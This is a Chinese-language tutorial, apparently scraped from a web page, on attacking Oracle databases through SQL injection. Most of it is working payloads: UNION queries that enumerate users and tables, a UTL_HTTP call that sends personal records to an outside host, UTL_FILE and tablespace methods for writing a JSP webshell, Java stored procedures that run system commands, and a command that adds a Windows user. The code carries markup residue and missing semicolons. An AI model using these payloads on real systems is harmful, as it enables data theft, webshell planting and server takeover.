Oracle数据库SQL注入高级技术与实战指南<\/h1>

0x00 Oracle数据库注入基础<\/h2>

Oracle与Mysql注入差异<\/h3>
Oracle使用虚拟表dual<\/code>进行查询，保证只有一条记录<\/li>
Oracle的UNION查询有严格的类型要求，必须与原始查询字段类型匹配<\/li>
使用NULL占位是Oracle注入的常用技巧：UNION SELECT NULL,NULL,NULL,NULL FROM dual--<\/code><\/li>
已知字段类型后可以精确匹配：UNION SELECT 1,NULL,NULL,NULL FROM dual--<\/code><\/li>
<\/ul>
Oracle分页查询技巧<\/h3>
Oracle使用三层嵌套查询实现分页：<\/p>
SELECT<\/span> *<\/span> FROM<\/span> (
<\/span><\/span>  SELECT<\/span> A.*<\/span>, ROWNUM RN FROM<\/span> (
<\/span><\/span>    select<\/span> *<\/span> from<\/span> session_roles
<\/span><\/span>  ) A WHERE<\/span> ROWNUM <=<\/span> 1<\/span>
<\/span><\/span>) WHERE<\/span> RN >=<\/span> 0<\/span>
<\/span><\/span><\/code><\/pre>Oracle信息收集技术<\/h3>

获取所有用户：<\/li>
<\/ol>
UNION<\/span> ALL<\/span> SELECT<\/span> NULL<\/span>, NULL<\/span>, NULL<\/span>, NVL(CAST<\/span>(OWNER<\/span> AS<\/span> VARCHAR(4000<\/span>)),CHR(32<\/span>)) FROM<\/span> (SELECT<\/span> DISTINCT<\/span>(OWNER<\/span>) FROM<\/span> SYS.ALL_TABLES)--
<\/span><\/span><\/span><\/code><\/pre>
获取数据库表：<\/li>
<\/ol>
UNION<\/span> ALL<\/span> SELECT<\/span> NULL<\/span>, NULL<\/span>, NULL<\/span>, NVL(CAST<\/span>(OWNER<\/span> AS<\/span> VARCHAR(4000<\/span>)),CHR(32<\/span>))||<\/span>CHR(45<\/span>)||<\/span>CHR(45<\/span>)||<\/span>CHR(45<\/span>)||<\/span>CHR(45<\/span>)||<\/span>CHR(45<\/span>)||<\/span>CHR(45<\/span>)||<\/span>NVL(CAST<\/span>(TABLE_NAME<\/span> AS<\/span> VARCHAR(4000<\/span>)),CHR(32<\/span>)) FROM<\/span> SYS.ALL_TABLES WHERE<\/span> OWNER<\/span> IN<\/span> (CHR(67<\/span>)||<\/span>CHR(84<\/span>)||<\/span>CHR(88<\/span>)||<\/span>CHR(83<\/span>)||<\/span>CHR(89<\/span>)||<\/span>CHR(83<\/span>),CHR(69<\/span>)||<\/span>CHR(88<\/span>)||<\/span>CHR(70<\/span>)||<\/span>CHR(83<\/span>)||<\/span>CHR(89<\/span>)||<\/span>CHR(83<\/span>),CHR(77<\/span>)||<\/span>CHR(68<\/span>)||<\/span>CHR(83<\/span>)||<\/span>CHR(89<\/span>)||<\/span>CHR(83<\/span>),CHR(79<\/span>)||<\/span>CHR(76<\/span>)||<\/span>CHR(65<\/span>)||<\/span>CHR(80<\/span>)||<\/span>CHR(83<\/span>)||<\/span>CHR(89<\/span>)||<\/span>CHR(83<\/span>),CHR(83<\/span>)||<\/span>CHR(67<\/span>)||<\/span>CHR(79<\/span>)||<\/span>CHR(84<\/span>)||<\/span>CHR(84<\/span>),CHR(83<\/span>)||<\/span>CHR(89<\/span>)||<\/span>CHR(83<\/span>),CHR(83<\/span>)||<\/span>CHR(89<\/span>)||<\/span>CHR(83<\/span>)||<\/span>CHR(84<\/span>)||<\/span>CHR(69<\/span>)||<\/span>CHR(77<\/span>),CHR(87<\/span>)||<\/span>CHR(77<\/span>)||<\/span>CHR(83<\/span>)||<\/span>CHR(89<\/span>)||<\/span>CHR(83<\/span>))--
<\/span><\/span><\/span><\/code><\/pre>
其他关键信息查询：<\/li>
<\/ol>
-- 版本信息
<\/span><\/span><\/span><\/span>select<\/span> banner from<\/span> sys.v_$version where<\/span> rownum=<\/span>1<\/span>
<\/span><\/span>-- 启动Oracle的用户名
<\/span><\/span><\/span><\/span>select<\/span> SYS_CONTEXT ('USERENV'<\/span>,'OS_USER'<\/span>) from<\/span> dual
<\/span><\/span>-- 服务器监听IP
<\/span><\/span><\/span><\/span>select<\/span> utl_inaddr.get_host_address from<\/span> dual
<\/span><\/span>-- 服务器操作系统
<\/span><\/span><\/span><\/span>select<\/span> member from<\/span> v$logfile where<\/span> rownum=<\/span>1<\/span>
<\/span><\/span>-- 当前连接用户
<\/span><\/span><\/span><\/span>select<\/span> SYS_CONTEXT ('USERENV'<\/span>, 'CURRENT_USER'<\/span>) from<\/span> dual
<\/span><\/span>-- 当前数据库名
<\/span><\/span><\/span><\/span>select<\/span> SYS_CONTEXT ('USERENV'<\/span>, 'DB_NAME'<\/span>) from<\/span> dual
<\/span><\/span><\/code><\/pre>0x01 Oracle高级注入技术<\/h2>
1. 友情备份技术<\/h3>
利用UTL_HTTP包实现数据外带：<\/p>
UTL_HTTP.request('http:\/\/xxx.cn:8080\/xxxx\/mysql.jsp?data='<\/span>||<\/span>ID|<\/span>USERID|<\/span>NAME|<\/span>RELATION|<\/span>OCCUPATION|<\/span>POSITION<\/span>|<\/span>ASSN||<\/span>UNIT|<\/span>TEL)
<\/span><\/span><\/code><\/pre>使用UTL_FILE实现本地备份：<\/p>
-- 创建目录
<\/span><\/span><\/span><\/span>create<\/span> or<\/span> replace<\/span> directory cux_log_dir as<\/span> 'E:\/soft\/apache-tomcat-7.0.37\/webapps\/ROOT\/selina'<\/span>
<\/span><\/span>-- 导出数据到文件
<\/span><\/span><\/span><\/span>declare<\/span>
<\/span><\/span>    frw utl_file.file_type
<\/span><\/span>begin<\/span>
<\/span><\/span>    frw:=<\/span>utl_file.fopen('CUX_LOG_DIR'<\/span>,'emp.txt'<\/span>,'w'<\/span>)
<\/span><\/span>    for<\/span> rec in<\/span> (select<\/span> *<\/span> from<\/span> admin<\/span>) loop
<\/span><\/span>        utl_file.put_line(frw,rec.id||<\/span>','<\/span>||<\/span>rec.password)
<\/span><\/span>    end<\/span> loop
<\/span><\/span>    utl_file.fclose(frw)
<\/span><\/span>end<\/span>
<\/span><\/span>\/<\/span>
<\/span><\/span><\/code><\/pre>2. GetShell技术<\/h3>
方法一：使用UTL_FILE<\/strong><\/p>
-- 创建目录
<\/span><\/span><\/span><\/span>create<\/span> or<\/span> replace<\/span> directory getshell_dir as<\/span> 'E:\/soft\/apache-tomcat-7.0.37\/webapps\/SqlInjection\/'<\/span>
<\/span><\/span>-- 写入shell
<\/span><\/span><\/span><\/span>declare<\/span>
<\/span><\/span>    frw utl_file.file_type
<\/span><\/span>begin<\/span>
<\/span><\/span>    frw:=<\/span>utl_file.fopen('GETSHELL_DIR'<\/span>,'yzmm.jsp'<\/span>,'w'<\/span>)
<\/span><\/span>    utl_file.put_line(frw,'hello world'<\/span>)
<\/span><\/span>    utl_file.fclose(frw)
<\/span><\/span>end<\/span>
<\/span><\/span>\/<\/span>
<\/span><\/span><\/code><\/pre>方法二：使用表空间(低权限)<\/strong><\/p>
create<\/span> tablespace shell datafile 'E:\/soft\/apache-tomcat-7.0.37\/webapps\/SqlInjection\/shell.jsp'<\/span> size<\/span> 100<\/span>k nologging
<\/span><\/span>CREATE<\/span> TABLE<\/span> SHELL(C<\/span> varchar2(100<\/span>)) tablespace shell
<\/span><\/span>insert<\/span> into<\/span> SHELL values<\/span>('hello world'<\/span>)
<\/span><\/span>commit<\/span>
<\/span><\/span>alter<\/span> tablespace shell offline
<\/span><\/span>drop<\/span> tablespace shell including<\/span> contents
<\/span><\/span><\/code><\/pre>3. SQLJ执行Java代码<\/h3>
写入Webshell：<\/strong><\/p>
-- 创建Java存储过程
<\/span><\/span><\/span><\/span>create<\/span> or<\/span> replace<\/span> and<\/span> compile java source<\/span> named "getShell"<\/span> as<\/span> 
<\/span><\/span>public<\/span> class<\/span> GetShell {<\/span>
<\/span><\/span>    public<\/span> static<\/span> int getShell(String p, String c<\/span>) {<\/span>
<\/span><\/span>        int RC =<\/span> -<\/span>1<\/span>
<\/span><\/span>        try {<\/span>
<\/span><\/span>            new<\/span> java.io.FileOutputStream(p).write<\/span>(c<\/span>.getBytes())
<\/span><\/span>            RC =<\/span> 1<\/span>
<\/span><\/span>        }<\/span> catch (Exception<\/span> e) {<\/span>
<\/span><\/span>            e.printStackTrace()
<\/span><\/span>        }<\/span>
<\/span><\/span>        return<\/span> RC
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>-- 创建函数
<\/span><\/span><\/span><\/span>create<\/span> or<\/span> replace<\/span> function<\/span> getShell(p in<\/span> varchar2, c<\/span> in<\/span> varchar2) return<\/span> number as<\/span>
<\/span><\/span>language<\/span> java name 'util.getShell(java.lang.String, java.lang.String) return Integer'<\/span>
<\/span><\/span>
<\/span><\/span>-- 创建存储过程
<\/span><\/span><\/span><\/span>create<\/span> or<\/span> replace<\/span> procedure<\/span> RC(p in<\/span> varChar, c<\/span> in<\/span> varChar) as<\/span>
<\/span><\/span>x number
<\/span><\/span>begin<\/span>
<\/span><\/span>    x :=<\/span> getShell(p,c<\/span>)
<\/span><\/span>end<\/span>
<\/span><\/span>
<\/span><\/span>-- 授予Java权限
<\/span><\/span><\/span><\/span>variable<\/span> x number
<\/span><\/span>set<\/span> serveroutput on<\/span>
<\/span><\/span>exec<\/span> dbms_java.set_output(100000<\/span>)
<\/span><\/span>grant<\/span> javasyspriv to<\/span> system<\/span>
<\/span><\/span>grant<\/span> javauserpriv to<\/span> system<\/span>
<\/span><\/span>
<\/span><\/span>-- 写webshell
<\/span><\/span><\/span><\/span>exec<\/span> :x:=<\/span>getShell('d:\/3.txt'<\/span>,'selina'<\/span>)
<\/span><\/span><\/code><\/pre>执行系统命令：<\/strong><\/p>
-- 创建Java存储过程
<\/span><\/span><\/span><\/span>create<\/span> or<\/span> replace<\/span> and<\/span> compile java source<\/span> named "Execute"<\/span> as<\/span> 
<\/span><\/span>import java.io.BufferedReader
<\/span><\/span>import java.io.InputStreamReader
<\/span><\/span>public<\/span> class<\/span> Execute<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void executeCmd(String c<\/span>) {<\/span>
<\/span><\/span>        try {<\/span>
<\/span><\/span>            String l=<\/span>""<\/span>,t
<\/span><\/span>            BufferedReader br =<\/span> new<\/span> BufferedReader(new<\/span> InputStreamReader(java.lang.Runtime.getRuntime().exec<\/span>(c<\/span>).getInputStream(),"gbk"<\/span>))
<\/span><\/span>            while((t=<\/span>br.readLine())!=<\/span>null<\/span>) {<\/span>
<\/span><\/span>                l+=<\/span>t+<\/span>"\n"<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>            System<\/span>.out<\/span>.println(l)
<\/span><\/span>        }<\/span> catch (Exception<\/span> e) {<\/span>
<\/span><\/span>            e.printStackTrace()
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>-- 创建存储过程
<\/span><\/span><\/span><\/span>create<\/span> or<\/span> replace<\/span> procedure<\/span> executeCmd(c<\/span> in<\/span> varchar2) as<\/span>
<\/span><\/span>language<\/span> java name 'Execute.executeCmd(java.lang.String)'<\/span>
<\/span><\/span>
<\/span><\/span>-- 执行命令
<\/span><\/span><\/span><\/span>exec<\/span> executeCmd('net user selina 123 \/add'<\/span>)
<\/span><\/span><\/code><\/pre>0x02 SQL注入工具实现原理<\/h2>
1. 检测注入点<\/h3>

发送正常请求和带有SQL注入的请求(如AND 1=1<\/code>和AND 1=12<\/code>)<\/li>
比较响应结果，不一致则可能存在注入<\/li>
<\/ul>
2. 确定字段数<\/h3>

使用ORDER BY<\/code>二分法确定字段数<\/li>
从1开始递增测试，直到页面报错<\/li>
<\/ul>
3. 获取数据库信息<\/h3>

构造UNION查询获取版本、用户、数据库名等信息<\/li>
使用特殊标记便于从响应中提取数据，如[version]...[\/version]<\/code><\/li>
<\/ul>
4. 检测文件权限<\/h3>

检查file_priv<\/code>权限判断是否能读写文件<\/li>
<\/ul>
0x03 实战案例<\/h2>
1. 绕过防注入<\/h3>

使用POST方式绕过GET防注入检测<\/li>
JSP中request.getParameter()<\/code>可获取GET和POST参数<\/li>
<\/ul>
2. 利用DWR框架漏洞<\/h3>

DWR框架可能暴露后端Java方法<\/li>
通过分析网络请求发现敏感信息泄露<\/li>
<\/ul>
3. 上传漏洞利用<\/h3>

构造multipart表单绕过Flash上传限制<\/li>
修改上传文件扩展名限制获取Webshell<\/li>
<\/ul>
4. 通用系统漏洞利用<\/h3>

针对通用系统，漏洞可批量利用<\/li>
通过密码破解进入后台进一步渗透<\/li>
<\/ul>
附录：各数据库获取表信息语句<\/h2>

MSSQL:<\/li>
<\/ol>
select<\/span> name from<\/span> master.dbo.sysdatabase
<\/span><\/span><\/code><\/pre>
MySQL:<\/li>
<\/ol>
show<\/span> databases
<\/span><\/span><\/code><\/pre>
Sybase:<\/li>
<\/ol>
SELECT<\/span> a.name,b.colid,b.name,c<\/span>.name,b.usertype,b.length<\/span>,
<\/span><\/span>CASE<\/span> WHEN<\/span> b.status=<\/span>0<\/span> THEN<\/span> 'NOT NULL'<\/span> WHEN<\/span> b.status=<\/span>8<\/span> THEN<\/span> 'NULL'<\/span> END<\/span> status, d.text 
<\/span><\/span>FROM<\/span> sysobjects a,syscolumns b,systypes c<\/span>,syscomments d 
<\/span><\/span>WHERE<\/span> a.id=<\/span>b.id AND<\/span> b.usertype=<\/span>c<\/span>.usertype AND<\/span> a.type<\/span>=<\/span>'U'<\/span> 
<\/span><\/span>--AND a.name='t_user' 
<\/span><\/span><\/span><\/span>AND<\/span> b.cdefault*=<\/span>d.id 
<\/span><\/span>ORDER<\/span> BY<\/span> a.name,b.colid
<\/span><\/span><\/code><\/pre>
Oracle:<\/li>
<\/ol>
SELECT<\/span> *<\/span> FROM<\/span> ALL_TABLES
<\/span><\/span><\/code><\/pre>